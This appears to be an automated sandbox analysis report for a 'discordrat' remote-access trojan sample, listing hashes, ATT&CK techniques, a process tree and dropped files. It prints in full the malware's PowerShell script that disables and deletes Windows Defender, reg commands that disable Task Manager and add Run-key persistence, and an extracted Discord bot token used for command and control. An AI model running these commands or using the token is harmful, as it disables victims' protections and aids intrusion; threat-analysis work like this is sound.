discordrat | 2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
11/10/2024, 22:08

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe
Size

663KB
MD5

043e699dbf3d88b6cca5fbe64229ba27
SHA1

50661d32315985eab2a70f1d1f6435b9563ca237
SHA256

2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747
SHA512

04f23cfa08684ce109685bf2068211731018a85bb588cff9de67faca8ecc6e3e02b150a656f91b55557e5f4a949400f90da19f8c37f5abfac034e68e4cc633c2
SSDEEP

6144:3E+yclwQKjdn+WPtYVJIoBf4xX26I6DqJM1tc2uQNQ5rHbIOohWy0f:3BdlwHRn+WlYV+Rp2yEM1tc2uYXOos

Score

10^/10

discordrat defense_evasion discovery evasion persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIwNzY2MzY3MDU0MTE2MDUwOQ.Gd6pNB.ScrscETWuXpifr43j4YDLQN_-m1c2UlONmnRmo
server_id
1097447165732868126

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/files/0x0007000000016d3f-32.dat	disable_win_def
behavioral1/memory/2704-40-0x00000000002E0000-0x000000000032A000-memory.dmp	disable_win_def
behavioral1/files/0x0007000000016d47-56.dat	disable_win_def

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Parameters	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Security	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\TriggerInfo\0	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\TriggerInfo	powershell.exe

Disables Task Manager via registry modification
evasion

Executes dropped EXE 3 IoCs

pid	Process
2616	bang_executor.exe
2704	executer.exe
2992	bang_executor.exe

Loads dropped DLL 14 IoCs

pid	Process
2968	cmd.exe
2968	cmd.exe
2968	cmd.exe
2640	cmd.exe
2588	WerFault.exe
2588	WerFault.exe
2588	WerFault.exe
2588	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2588	WerFault.exe
2808	WerFault.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\bang_executor = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\bang_executor.exe"	reg.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2324	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2324	powershell.exe

Suspicious use of WriteProcessMemory 59 IoCs

description	pid	Process	procid_target
PID 2320 wrote to memory of 2968	2320	2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe	28
PID 2320 wrote to memory of 2968	2320	2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe	28
PID 2320 wrote to memory of 2968	2320	2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe	28
PID 2320 wrote to memory of 2968	2320	2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe	28
PID 2968 wrote to memory of 2616	2968	cmd.exe	30
PID 2968 wrote to memory of 2616	2968	cmd.exe	30
PID 2968 wrote to memory of 2616	2968	cmd.exe	30
PID 2968 wrote to memory of 2616	2968	cmd.exe	30
PID 2968 wrote to memory of 2704	2968	cmd.exe	31
PID 2968 wrote to memory of 2704	2968	cmd.exe	31
PID 2968 wrote to memory of 2704	2968	cmd.exe	31
PID 2968 wrote to memory of 2704	2968	cmd.exe	31
PID 2968 wrote to memory of 2724	2968	cmd.exe	32
PID 2968 wrote to memory of 2724	2968	cmd.exe	32
PID 2968 wrote to memory of 2724	2968	cmd.exe	32
PID 2968 wrote to memory of 2724	2968	cmd.exe	32
PID 2968 wrote to memory of 2872	2968	cmd.exe	33
PID 2968 wrote to memory of 2872	2968	cmd.exe	33
PID 2968 wrote to memory of 2872	2968	cmd.exe	33
PID 2968 wrote to memory of 2872	2968	cmd.exe	33
PID 2968 wrote to memory of 2640	2968	cmd.exe	34
PID 2968 wrote to memory of 2640	2968	cmd.exe	34
PID 2968 wrote to memory of 2640	2968	cmd.exe	34
PID 2968 wrote to memory of 2640	2968	cmd.exe	34
PID 2640 wrote to memory of 2780	2640	cmd.exe	39
PID 2640 wrote to memory of 2780	2640	cmd.exe	39
PID 2640 wrote to memory of 2780	2640	cmd.exe	39
PID 2640 wrote to memory of 2780	2640	cmd.exe	39
PID 2640 wrote to memory of 2992	2640	cmd.exe	40
PID 2640 wrote to memory of 2992	2640	cmd.exe	40
PID 2640 wrote to memory of 2992	2640	cmd.exe	40
PID 2640 wrote to memory of 2992	2640	cmd.exe	40
PID 2724 wrote to memory of 2536	2724	cmd.exe	41
PID 2724 wrote to memory of 2536	2724	cmd.exe	41
PID 2724 wrote to memory of 2536	2724	cmd.exe	41
PID 2724 wrote to memory of 2536	2724	cmd.exe	41
PID 2872 wrote to memory of 2488	2872	cmd.exe	42
PID 2872 wrote to memory of 2488	2872	cmd.exe	42
PID 2872 wrote to memory of 2488	2872	cmd.exe	42
PID 2872 wrote to memory of 2488	2872	cmd.exe	42
PID 2724 wrote to memory of 2484	2724	cmd.exe	43
PID 2724 wrote to memory of 2484	2724	cmd.exe	43
PID 2724 wrote to memory of 2484	2724	cmd.exe	43
PID 2724 wrote to memory of 2484	2724	cmd.exe	43
PID 2704 wrote to memory of 2564	2704	executer.exe	44
PID 2704 wrote to memory of 2564	2704	executer.exe	44
PID 2704 wrote to memory of 2564	2704	executer.exe	44
PID 2704 wrote to memory of 2996	2704	executer.exe	46
PID 2704 wrote to memory of 2996	2704	executer.exe	46
PID 2704 wrote to memory of 2996	2704	executer.exe	46
PID 2996 wrote to memory of 2324	2996	cmd.exe	48
PID 2996 wrote to memory of 2324	2996	cmd.exe	48
PID 2996 wrote to memory of 2324	2996	cmd.exe	48
PID 2992 wrote to memory of 2588	2992	bang_executor.exe	49
PID 2992 wrote to memory of 2588	2992	bang_executor.exe	49
PID 2992 wrote to memory of 2588	2992	bang_executor.exe	49
PID 2616 wrote to memory of 2808	2616	bang_executor.exe	50
PID 2616 wrote to memory of 2808	2616	bang_executor.exe	50
PID 2616 wrote to memory of 2808	2616	bang_executor.exe	50

C:\Users\Admin\AppData\Local\Temp\2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe
"C:\Users\Admin\AppData\Local\Temp\2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang.bat" "
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
    bang_executor.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2616
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2616 -s 596
      4⤵
      Loads dropped DLL
      PID:2808
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\executer.exe
    executer.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps1
      4⤵
      PID:2564
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2996
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ep bypass .\test.ps1;
        5⤵
        Modifies security service
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K instaling.bat
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2536
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K mgr.bat
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2872
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K microsoft.bat
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2640
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:2780
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2992
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2992 -s 600
        5⤵
        Loads dropped DLL
        
        PID:2588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang.bat

Filesize
121B

MD5
140d432dacc3a675f31bfc80171fc928

SHA1
6b886ca57fc64d079f943fae06210d41341b33b2

SHA256
dcb23167ac8eccdb760afc56b99ef4019cbcf9dbcdf1174f2040b361f3b4f534

SHA512
b925bec48d68ec12e6829e07c6d45b313505164d60444dd556f3f6e1739bdb4192e1c2a7d1f14f53c8c77086e49ab9f419df11e9b6c054906d05d5c38ba4cf6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe

Filesize
343KB

MD5
e1ead094e52097b884389a8064b15e2b

SHA1
894f8db63a8f41f913a5f5c69d1199ec8ae3f213

SHA256
82c67ed82a7a319c0ae30f92c187ea0150ac6ba6ef63d2d3b4fc999bb01d064f

SHA512
96bf368c771bbc9db1a23b8e57906530936372aa15c963ef370ef47a13328fc67201d4d184911679536ce952869a4bc2abdc42403e1978028c57c27b154ecea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\executer.exe

Filesize
274KB

MD5
88e22186f196cc0e1e2d500eeac57337

SHA1
e5e0bd98f08de159880b58e918959c358efca6b1

SHA256
5dca36ce98da2185693a87305811cf7aeee7b3279298345e4d1f4d37efe0250b

SHA512
462fe680ba12da5fedec11d88ea17f9f65b80ee916f665d6208d9dcf3d3494c805d11aaf899914f621835b0a61d014000243fe01b2e00ca34681afc415a33ee6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\instaling.bat

Filesize
269B

MD5
7e86beb4c1ebeb8ab77f1d68f14fec37

SHA1
c9a40241b2407d9492c41bcd70686d6fd829f3bc

SHA256
5a60b3cc91782e0a7c8cd52701e603299b62c87c0b593d5ac85ebce74321f2f3

SHA512
653ce9cbcf427be11042340859f61cfa30105332acad13b94e2d509960ba04d67610276b6a7128d56aa139098b0c1c8d67973fff7a97976acfb33d474073d849

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\mgr.bat

Filesize
111B

MD5
9a4a032d9a604c9b7c1e843c6455140e

SHA1
dbe7a610e1697e62722efb59ad3bc03afcfd900f

SHA256
dc0890d3d4a7370ece704eb075c05418795c47332dffcc277896e806c38c3db0

SHA512
ca045ec576eb55c442959c2709148392fe53f1613b6c5dc9cb5b43592d77563479233c7dee6e0832e5a95528e1653ba6b73c73a3dc4ed841a7529e6344eccb3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\microsoft.bat

Filesize
288B

MD5
77c6969c2641f3c5d6ed44a4feb48f25

SHA1
9ff375b96cd38ca40a9694698e9aa3be1fc1d52e

SHA256
33dbedbe9fb27de7c1f75d742e3992675c4d683073538b02a8d69922f366cd6a

SHA512
530f05816854791916b3409161a1e488d661e02340c4ae7b442ede31f7b21f70a6b5cfd5d1b330ddd202e104b5f4219253c537d32770e0fddf0640d178eefa68

Download Submit
C:\test.ps1

Filesize
3KB

MD5
3499745c76f31429c42a3b34d8cc0af6

SHA1
f9125070406cc2a2a6cf092f3ed3d36751107224

SHA256
3c2eb503e7d32f48b06199e6c1c350e559c316fd9f6f17f040e41079f44fb6e3

SHA512
1757ee5f42a8681e84ce3070d7ee164107ebc284bc0eb5424a4e71fe71e122eeadb28d63535d88557c0c49c687ce4514e8d387781ec7c68e1171994183dde1fb

Download Submit
memory/2324-46-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/2324-47-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2616-39-0x000000013FD20000-0x000000013FD7A000-memory.dmp

Filesize
360KB

Download
memory/2704-40-0x00000000002E0000-0x000000000032A000-memory.dmp

Filesize
296KB

Download